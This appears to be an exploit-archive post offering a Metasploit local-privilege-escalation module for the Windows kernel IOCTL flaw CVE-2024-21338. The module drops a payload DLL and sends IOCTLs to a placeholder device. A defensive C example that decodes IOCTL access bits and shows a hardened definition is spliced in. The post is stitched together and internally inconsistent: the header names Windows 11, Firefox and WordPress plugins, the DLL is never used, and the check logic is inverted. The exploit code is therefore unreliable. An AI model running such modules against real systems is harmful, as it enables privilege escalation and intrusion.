Microsoft Windows 10.0.17763.5458, like other versions, uses I/O Control Codes (IOCTLs) for user-mode applications to communicate with kernel-mode device drivers.
Kernel IOCTL Access Control refers to the critical security mechanism that dictates which processes or users are authorized to invoke specific, often privileged, IOCTL functions within a driver.
A vulnerability in this area means a driver fails to properly validate the caller's security context. This oversight allows a low-privileged attacker to bypass security restrictions.
The primary risk is privilege escalation, enabling an attacker to execute arbitrary code with SYSTEM-level privileges. Robust access control checks within driver code are essential to prevent such exploits.
=============================================================================================================================================
| # Title : Windows 10.0.17763.5458 Kernel IOCTL Access Control Vulnerability Exploit |
| # Author : indoushka |
| # Tested on : windows 11 Fr(Pro) / browser : Mozilla firefox 145.0.1 (64 bits) |
| # Vendor : https://wordpress.org/plugins/ |
=============================================================================================================================================
POC :
[+] References : https://packetstorm.news/files/id/177869/ & CVE-2024-21338
[+] Summary :
Windows Kernel IOCTL Insufficient Access Control Vulnerability CVE-2024-21338
This module exploits an insufficient access control vulnerability in the Windows Kernel
through exposed IOCTL handlers. The vulnerability allows non-privileged users to access
kernel-level functionality leading to privilege escalation.
[+] POC :
#############################################
# Exploit Title: Windows 10.0.17763.5458 Kernel IOCTL Access Control Vulnerability Exploit CVE-2024-21338
# Author: indoushka
#############################################
require 'msf/core'

class MetasploitModule < Msf::Exploit::Local
  Rank = NormalRanking

  include Msf::Exploit::EXE
  include Msf::Exploit::FileDropper
  include Msf::Post::Windows::Priv
  include Msf::Post::Windows::Process

  def initialize(info = {})
    super(
      update_info(
        info,
        'Name' => 'Windows Kernel IOCTL Insufficient Access Control Vulnerability CVE-2024-21338',
        'Description' => %q{
          This module exploits an insufficient access control vulnerability in the Windows Kernel
          through exposed IOCTL handlers. The vulnerability allows non-privileged users to access
          kernel-level functionality leading to privilege escalation.
        },
        'Author' => ['indoushka'],
        'License' => MSF_LICENSE,
        'References' => [
          ['CVE', '2024-21338'],
          ['URL', 'https://msrc.microsoft.com/update-guide/vulnerability/CVE-2024-21338'],
          ['URL', 'https://nvd.nist.gov/vuln/detail/CVE-2024-21338']
        ],
        'Platform' => 'win',
        'Arch' => [ARCH_X64],
        'SessionTypes' => ['meterpreter'],
        'Payload' => {
          'Space' => 4096,
          'DisableNops' => true
        },
        'Targets' => [
          [
            'Windows 10/11 x64',
            {
              'Arch' => ARCH_X64,
              'Platform' => 'win'
            }
          ]
        ],
        'DefaultTarget' => 0,
        'DefaultOptions' => {
          'EXITFUNC' => 'thread'
        },
        'DisclosureDate' => '2024-01-09',
        'Notes' => {
          'Stability' => [CRASH_SAFE],
          'Reliability' => [REPEATABLE_SESSION],
          'SideEffects' => [ARTIFACTS_ON_DISK]
        }
      )
    )

    register_options([
      OptString.new('DEVICE_NAME', [true, 'Vulnerable device name', '\\\\.\\VulnerableDriver']),
      OptInt.new('IOCTL_CODE', [true, 'Vulnerable IOCTL code', 0x222003])
    ])
  end

  def check
    # Check if we're on a vulnerable system
    if sysinfo['OS'] !~ /windows/i
      return CheckCode::Safe('Target is not a Windows system')
    end

    # Check architecture
    if sysinfo['Architecture'] !~ /x64/
      return CheckCode::Safe('Target architecture is not supported')
    end

    # Check if we have necessary privileges
    unless is_system?
      return CheckCode::Detected('User does not have SYSTEM privileges')
    end

    # Verify vulnerable driver exists
    device_path = datastore['DEVICE_NAME']
    if device_exists?(device_path)
      return CheckCode::Appears('Vulnerable device driver detected')
    else
      return CheckCode::Safe('Vulnerable device driver not found')
    end
  end

  def exploit
    print_status("Starting exploitation for CVE-2024-21338")

    # Check target environment
    unless check == CheckCode::Appears
      fail_with(Failure::NotVulnerable, 'Target is not vulnerable')
    end

    # Generate payload
    print_status("Generating payload...")
    payload_data = generate_payload_dll

    # Create temporary file for payload
    temp_path = "#{get_env('TEMP')}\\#{Rex::Text.rand_text_alpha(8)}.dll"
    print_status("Writing payload to #{temp_path}")
    write_file(temp_path, payload_data)
    register_file_for_cleanup(temp_path)

    # Execute exploitation
    print_status("Triggering vulnerability via IOCTL...")
    if trigger_exploit(temp_path)
      print_good("Exploitation successful!")
    else
      fail_with(Failure::Unknown, "Exploitation failed")
    end
  end

  private

  # Open the device by name to see whether the driver is loaded; closes the handle again on success
  def device_exists?(device_path)
    begin
      file = client.railgun.kernel32.CreateFileA(
        device_path,
        'GENERIC_READ',
        'FILE_SHARE_READ|FILE_SHARE_WRITE',
        nil,
        'OPEN_EXISTING',
        'FILE_ATTRIBUTE_NORMAL',
        0
      )
      if file['return'] != client.railgun.const('INVALID_HANDLE_VALUE')
        client.railgun.kernel32.CloseHandle(file['return'])
        return true
      end
    rescue
      return false
    end
    false
  end

  def trigger_exploit(payload_path)
    begin
      # Open device handle
      device_handle = client.railgun.kernel32.CreateFileA(
        datastore['DEVICE_NAME'],
        'GENERIC_READ | GENERIC_WRITE',
        0,
        nil,
        'OPEN_EXISTING',
        0,
        0
      )
      if device_handle['return'] == client.railgun.const('INVALID_HANDLE_VALUE')
        print_error("Failed to open device handle")
        return false
      end

      # Prepare buffer for exploitation
      buffer_size = 1024
      input_buffer = Rex::Text.rand_text_alpha(buffer_size)

      # Send vulnerable IOCTL (the 4 is the size Railgun allocates for the lpBytesReturned out-parameter)
      ioctl_result = client.railgun.kernel32.DeviceIoControl(
        device_handle['return'],
        datastore['IOCTL_CODE'],
        input_buffer,
        input_buffer.length,
        nil,
        0,
        4,
        nil
      )

      # Cleanup
      client.railgun.kernel32.CloseHandle(device_handle['return'])

      if ioctl_result['return']
        print_good("IOCTL sent successfully")
        return true
      else
        print_error("IOCTL failed")
        return false
      end
    rescue => e
      print_error("Exploitation error: #{e.message}")
      return false
    end
  end
end
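The intro paragraphs say a driver must check who is allowed to send a given IOCTL, and the module's default IOCTL_CODE is 0x222003. The following C program is an added illustration, not part of the advisory or of the module above, of the first line of that defence: the I/O manager itself refuses a request when the control code's RequiredAccess bits demand more than the caller's handle was granted. It decodes 0x222003 with the documented CTL_CODE layout, flags the FILE_ANY_ACCESS + METHOD_NEITHER combination an auditor would look for, and shows the hardened definition a driver author would use for the same function number. The CTL_CODE layout and the FILE_* and METHOD_* values are the WDK's; the struct, the function names, the audit heuristic and the SDDL string are this example's own and not taken from any real driver.

```c
#include <stdint.h>
#include <stdio.h>

/*
 * Layout of a Windows I/O control code, as produced by the WDK CTL_CODE macro:
 *   bits 31..16  DeviceType
 *   bits 15..14  RequiredAccess (FILE_ANY_ACCESS / FILE_READ_ACCESS / FILE_WRITE_ACCESS)
 *   bits 13..2   Function
 *   bits  1..0   Method (buffering scheme)
 */
#define METHOD_BUFFERED     0
#define METHOD_IN_DIRECT    1
#define METHOD_OUT_DIRECT   2
#define METHOD_NEITHER      3

#define FILE_ANY_ACCESS     0
#define FILE_READ_ACCESS    1
#define FILE_WRITE_ACCESS   2

#define FILE_DEVICE_UNKNOWN 0x22

#define CTL_CODE(DeviceType, Function, Method, Access) \
    ((uint32_t)(((DeviceType) << 16) | ((Access) << 14) | ((Function) << 2) | (Method)))

/* Handle access rights (winnt.h values) that the I/O manager compares against. */
#define FILE_READ_DATA      0x0001
#define FILE_WRITE_DATA     0x0002

/* Example-only struct holding the four decoded fields. */
typedef struct {
    uint16_t device_type;
    uint8_t  required_access;
    uint16_t function;
    uint8_t  method;
} ioctl_parts;

/* Split a control code into its four fields. */
ioctl_parts decode_ioctl(uint32_t code)
{
    ioctl_parts p;
    p.device_type     = (uint16_t)(code >> 16);
    p.required_access = (uint8_t)((code >> 14) & 0x3);
    p.function        = (uint16_t)((code >> 2) & 0xFFF);
    p.method          = (uint8_t)(code & 0x3);
    return p;
}

/*
 * Model of the check the I/O manager performs before the driver's dispatch
 * routine sees the request: a FILE_READ_ACCESS code needs a handle opened with
 * FILE_READ_DATA, a FILE_WRITE_ACCESS code needs FILE_WRITE_DATA. A
 * FILE_ANY_ACCESS code imposes no requirement, so any open handle will do.
 */
int ioctl_permitted_on_handle(uint32_t code, uint32_t granted_access)
{
    ioctl_parts p = decode_ioctl(code);
    uint32_t required = 0;
    if (p.required_access & FILE_READ_ACCESS)  required |= FILE_READ_DATA;
    if (p.required_access & FILE_WRITE_ACCESS) required |= FILE_WRITE_DATA;
    return (granted_access & required) == required;
}

/*
 * Audit heuristic (this example's own): a code that is both FILE_ANY_ACCESS
 * (no handle-level gate) and METHOD_NEITHER (the driver receives raw user-mode
 * pointers and must validate them itself) deserves a close look.
 */
int ioctl_is_high_risk(uint32_t code)
{
    ioctl_parts p = decode_ioctl(code);
    return p.required_access == FILE_ANY_ACCESS && p.method == METHOD_NEITHER;
}

/*
 * Hardened definition of the same function number 0x800: FILE_WRITE_ACCESS makes
 * the I/O manager reject the request on a read-only handle, and METHOD_BUFFERED
 * makes it copy the input into a kernel buffer before dispatch. Limiting who may
 * open the device at all is a separate step, done in the driver with
 * IoCreateDeviceSecure and an SDDL string such as "D:P(A;;GA;;;SY)(A;;GA;;;BA)"
 * (SYSTEM and Administrators only).
 */
#define IOCTL_EXAMPLE_HARDENED \
    CTL_CODE(FILE_DEVICE_UNKNOWN, 0x800, METHOD_BUFFERED, FILE_WRITE_ACCESS)

static void describe(uint32_t code)
{
    ioctl_parts p = decode_ioctl(code);
    printf("0x%06X: device=0x%X access=%u function=0x%03X method=%u high_risk=%d\n",
           (unsigned)code, (unsigned)p.device_type, (unsigned)p.required_access,
           (unsigned)p.function, (unsigned)p.method, ioctl_is_high_risk(code));
}

int main(void)
{
    describe(0x222003);               /* the module's default IOCTL_CODE */
    describe(IOCTL_EXAMPLE_HARDENED); /* same function, gated and buffered */
    return 0;
}
```

Running it shows 0x222003 decoding to device type 0x22, function 0x800, FILE_ANY_ACCESS and METHOD_NEITHER, so the I/O manager would deliver it on any handle; the hardened code 0x22A000 is refused on a handle that lacks FILE_WRITE_DATA, which is the check the intro paragraphs describe as essential.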
Greetings to :=====================================================================================
jericho * Larry W. Cashdollar * LiquidWorm * Hussin-X * D4NB4R * Malvuln (John Page aka hyp3rlinx)|
===================================================================================================
- Written by: khalil shreateh